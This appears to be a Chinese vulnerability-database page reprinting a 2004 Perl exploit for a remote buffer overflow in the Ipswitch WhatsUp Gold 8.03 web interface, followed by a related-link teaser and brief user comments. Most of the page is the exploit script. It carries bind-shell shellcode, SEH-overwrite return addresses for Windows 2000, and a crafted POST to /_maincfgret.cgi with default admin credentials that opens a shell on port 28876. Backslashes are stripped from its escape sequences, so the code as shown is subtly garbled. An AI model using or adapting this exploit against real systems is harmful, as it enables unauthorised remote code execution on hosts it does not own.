Ipswitch WhatsUp Gold 7.0/8.0 – Notification Instance Name Remote Buffer Overflow
漏洞ID | 1054581 | 漏洞类型 | |
发布时间 | 2004-09-03 | 更新时间 | 2004-09-03 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11109/info
The Ipswitch WhatsUp Gold web interface is prone to a remotely exploitable buffer overflow vulnerability. This may be exploited by authenticated users of the interface to execute arbitrary code in the context of the program.
#!/usr/bin/perl
# [LoWNOISE] NotmuchG.pl v.1.5
# ================================================
# IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit
# ================================================
#
# Exploit by ET LoWNOISE Colombia
# et(at)cyberspace.org
# Oct/2004
#
# Tested on WIN2K SP4
#
# The exploit takes control by overwriting the pointer of a Structured Exception Handler,
# installed by WhatsUP and points to a routine that handles exceptions.
# (http://www.thc.org/papers/Practical-SEH-exploitation.pdf Johnny Cyberpunk THC)
#
# The overflow string has to be around 4080 in length to generate an exception that can
# be manipulated by changing the SEH pointer (ret [815]).
#
#
# Bug Discovered by
# iDEFENSE Security Advisory 08.25.04
# http://www.idefense.com/application/poi/display?type=vulnerabilities
#
# Greetz to the midget, the m3 and los parces , the seltiks, p0ch1n,Ritt3r,Mav, f4lc0n..
use strict;
use IO::Socket::INET;
usage() unless (@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# Bind shellcode port 28876 (HDM, metasploit.org)
my $shellcode =
"xebx43x56x57x8bx45x3cx8bx54x05x78x01xeax52x8bx52".
"x20x01xeax31xc0x31xc9x41x8bx34x8ax01xeex31xffxc1".
"xcfx13xacx01xc7x85xc0x75xf6x39xdfx75xeax5ax8bx5a".
"x24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01".
"xe8x5fx5exffxe0xfcx31xc0x64x8bx40x30x8bx40x0cx8b".
"x70x1cxadx8bx68x08x31xc0x66xb8x6cx6cx50x68x33x32".
"x2ex64x68x77x73x32x5fx54xbbx71xa7xe8xfexe8x90xff".
"xffxffx89xefx89xc5x81xc4x70xfexffxffx54x31xc0xfe".
"xc4x40x50xbbx22x7dxabx7dxe8x75xffxffxffx31xc0x50".
"x50x50x50x40x50x40x50xbbxa6x55x34x79xe8x61xffxff".
"xffx89xc6x31xc0x50x50x35x02x01x70xccxfexccx50x89".
"xe0x50x6ax10x50x56xbbx81xb4x2cxbexe8x42xffxffxff".
"x31xc0x50x56xbbxd3xfax58x9bxe8x34xffxffxffx58x6a".
"x10x54x50x56xbbx47xf3x56xc6xe8x24xffxffxffx31xdb".
"x53x68x2ex63x6dx64x89xe1x41x50x50x50x53x53x31xc0".
"xfexc4x40x50x53x53x53x53x53x53x53x53x53x53x6ax44".
"x89xe6x50x55x53x53x53x53x54x56x53x53x53x43x53x4b".
"x53x53x51x53x89xfdxbbx21xd0x05xd0xe8xe2xfexffxff".
"x31xc0x48x8bx44x24x04xbbx43xcbx8dx5fxe8xd1xfexff".
"xffx5dx5dx5dxbbx12x6bx6dxd0xe8xc4xfexffxffx31xc0".
"x50x89xfdxbbx69x1dx42x3axe8xb5xfexffxff";
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to the host.n";
$socket->autoflush(1);
print $socket "POST /_maincfgret.cgi HTTP/1.0rn";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword, application/x-shockwave-flash,
application/vnd.citrix.AdvGWClient-2_2, */*rn";
print $socket "Referer:
http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=endrn";
print $socket "Accept-Language: en-usrnContent-Type:
application/x-www-form-urlencodedrnConnection: Keep-Alivern";
print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; T312461; .NET CLR 1.1.4322)rn";
print $socket "Host: 127.0.0.1rnContent-Length: ";
my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename=";
#[-------815-------------] [ret] [-------------4080---------]
#[A.....811...A][jmp] [ret] [nops][shc][E.......E ]
$cmd .= "A"x811; #815 -4
$cmd .= "xebx06x90x90"; #jumper <eb + 06> <garbage> jmp to shellcode
#$cmd .= "xfex63xa1x71"; #winXP SP1 ws2help.dll
$cmd .= "xc4x2ax02x75"; #win2k sp0-sp4 ws2help.dll
#$cmd .= "LOWNOISE"; #garbage :D
$cmd .= "x90"x2080;
$cmd .= $shellcode;
$cmd .= "E"x(2000-length($shellcode)); #mas basura
$cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";
print $socket length($cmd)."rnPragma: no-cachernAuthorization: Basic
YWRtaW46YWRtaW4=rnrn";
print $socket $cmd."rn";
close($socket);
exit(0);
sub usage
{
print "n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploitn";
print "===================================================n";
print "nUsage: NotmuchG.pl [host] [port]n";
print "[host] Target hostn[port] WhatsUp webserver portnn";
print "n Shell on tcp port 28876.nn";
print "ET LoWNOISE 2004n";
exit(1);
}
相关推荐: Finjan SurfinGate Java Applet Analyzer Bypass Vulnerability
Finjan SurfinGate Java Applet Analyzer Bypass Vulnerability 漏洞ID 1100946 漏洞类型 Configuration Error 发布时间 2003-01-28 更新时间 2003-01-28 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666